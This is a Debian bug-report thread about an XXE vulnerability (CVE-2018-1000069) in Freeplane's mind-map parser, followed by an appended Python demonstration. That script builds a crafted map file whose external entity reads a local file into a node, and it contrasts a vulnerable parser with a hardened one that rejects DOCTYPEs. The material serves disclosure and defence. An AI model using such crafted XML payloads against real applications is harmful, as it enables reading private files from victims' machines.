Bug#893663: freeplane: CVE-2018-1000069 XXE vulnerability
Felix Natter
fnatter at gmx.net
Thu Mar 22 19:52:51 UTC 2018
Markus Koschany <apo at debian.org> writes:
> Package: freeplane
> X-Debbugs-CC: team at security.debian.org
> X-Debbugs-CC: fnatter at gmx.net
> Severity: important
> Tags: security
>
> Hi,
hello Markus,
> the following vulnerability was published for freeplane. Apparently only
> stretch/jessie/wheezy might be affected.
Thank you for paying attention to this, I completely overlooked this!
> @Felix
> Can you tell us more about this vulnerability? There only seems to be a
> reference in freeplane's wiki.
I think it is very well explained here:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
In short: External entities are "includes" for XML documents that can
be specified in DTDs.
Here is the commit that should fix it:
https://github.com/freeplane/freeplane/commit/a5dce7f9f
> https://www.freeplane.org/wiki/index.php/XML_External_Entity_vulnerability_in_map_parser
>
> CVE-2018-1000069[0]:
> | FreePlane version 1.5.9 and earlier contains a XML External Entity
> | (XXE) vulnerability in XML Parser in mindmap loader that can result in
> | stealing data from victim's machine. This attack appears to require
> | the victim to open a specially crafted mind map file. This
> | vulnerability appears to have been fixed in 1.6+.
>
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2018-1000069
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000069
>
> Please adjust the affected versions in the BTS as needed.
I can confirm that the fix is in 1.5.20 and 1.6.1, so it's true that
wheezy, jessie and stretch are affected.
Shall I add the patch in git branches from the debian/X tags here?
https://anonscm.debian.org/cgit/pkg-java/freeplane.git
Or did you want to do this, Markus?
I will read more about security updates on the weekend.
Cheers and Best Regards,
--
Felix Natter
debian/rules!
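Added example for this thread (not Freeplane's code, and not the fix in the commit linked above): a constructed, Freeplane-shaped map file whose internal DTD declares an external entity pointing at a local file, parsed once with external entity loading on and once with a parser that rejects any DOCTYPE. Python's own xml.sax reader is used because it runs stand-alone; note that it has external general entities switched off by default since 3.7.1, so the "vulnerable" parser re-enables them to reproduce what a default Java DOM/SAX parser does out of the box. The secret file, its contents, the `&leak;` entity and the `RejectDoctype`/`NodeTextCollector` helpers are all assumptions of this example; the hardened variant mirrors the `disallow-doctype-decl` feature that Xerces-based Java parsers expose.

```python
"""XXE in a mind-map loader: crafted map vs. a parser that refuses DTDs.

Constructed example for the CVE-2018-1000069 discussion; not Freeplane code.
"""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler

SECRET = "token=hunter2"  # constructed contents of the file the map exfiltrates

# Ordinary map without a DOCTYPE; the hardened parser must still accept it.
BENIGN_MAP = ('<map version="1.5.9"><node TEXT="root">'
              '<node TEXT="child">plain text</node></node></map>')


def write_secret(content=SECRET):
    """Stand-in for a file on the victim's machine (constructed input)."""
    fd, path = tempfile.mkstemp(prefix="xxe-secret-", suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(content)
    return path  # absolute POSIX path, so file://{path} is a valid URL


def crafted_map(secret_path):
    """Minimal Freeplane-style .mm document carrying the payload.

    The internal DTD subset declares &leak; as an external entity whose
    replacement text is the contents of secret_path.  XML forbids external
    entity references inside attribute values, so the reference has to sit
    in element content rather than in a node's TEXT attribute."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<!DOCTYPE map [\n'
            f'  <!ENTITY leak SYSTEM "file://{secret_path}">\n'
            ']>\n'
            '<map version="1.5.9">\n'
            '  <node TEXT="root">\n'
            '    <node TEXT="exfil">&leak;</node>\n'
            '  </node>\n'
            '</map>\n')


class NodeTextCollector(xml.sax.handler.ContentHandler):
    """Records each element's character content keyed by its TEXT attribute,
    which makes the effect of entity expansion easy to inspect."""

    def __init__(self):
        super().__init__()
        self.nodes = {}
        self._stack = []  # one (label, chunks) pair per open element

    def startElement(self, name, attrs):
        self._stack.append((attrs.get("TEXT", name), []))

    def characters(self, content):
        if self._stack:
            self._stack[-1][1].append(content)

    def endElement(self, name):
        label, chunks = self._stack.pop()
        text = "".join(chunks).strip()
        if text:
            self.nodes[label] = text


class RejectDoctype:
    """SAX lexical handler that aborts on any DOCTYPE.  Entity declarations
    can only come from a DTD, so refusing the DTD removes XXE wholesale
    (this assumes a map file never legitimately needs one)."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DOCTYPE '{name}' rejected: DTDs are not allowed in map files")

    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def _parse(xml_text, parser):
    collector = NodeTextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return collector.nodes


def parse_vulnerable(xml_text):
    """Parser with external general entities resolved (the Java default;
    re-enabled here because Python >= 3.7.1 turns it off)."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    return _parse(xml_text, parser)


def parse_hardened(xml_text):
    """Keep entity loading off and refuse DOCTYPE altogether."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setFeature(xml.sax.handler.feature_external_pes, False)
    parser.setProperty(xml.sax.handler.property_lexical_handler, RejectDoctype())
    return _parse(xml_text, parser)


def demo():
    """Run both parsers over the crafted map; returns what each produced."""
    secret_path = write_secret()
    try:
        payload = crafted_map(secret_path)
        leaked = parse_vulnerable(payload)          # node 'exfil' now holds SECRET
        try:
            parse_hardened(payload)
            blocked = None
        except ValueError as err:
            blocked = str(err)                      # DOCTYPE rejected, nothing read
    finally:
        os.unlink(secret_path)
    return {"leaked": leaked, "blocked": blocked, "benign": parse_hardened(BENIGN_MAP)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The leak works without the victim's application ever displaying the node: whatever the loader does with the parsed text (save, export, sync) carries the file contents along, which is the "stealing data" the CVE text refers to. Rejecting the DOCTYPE is the cheapest fix; merely disabling external entities would leave internal-entity expansion attacks (billion laughs) to be handled separately.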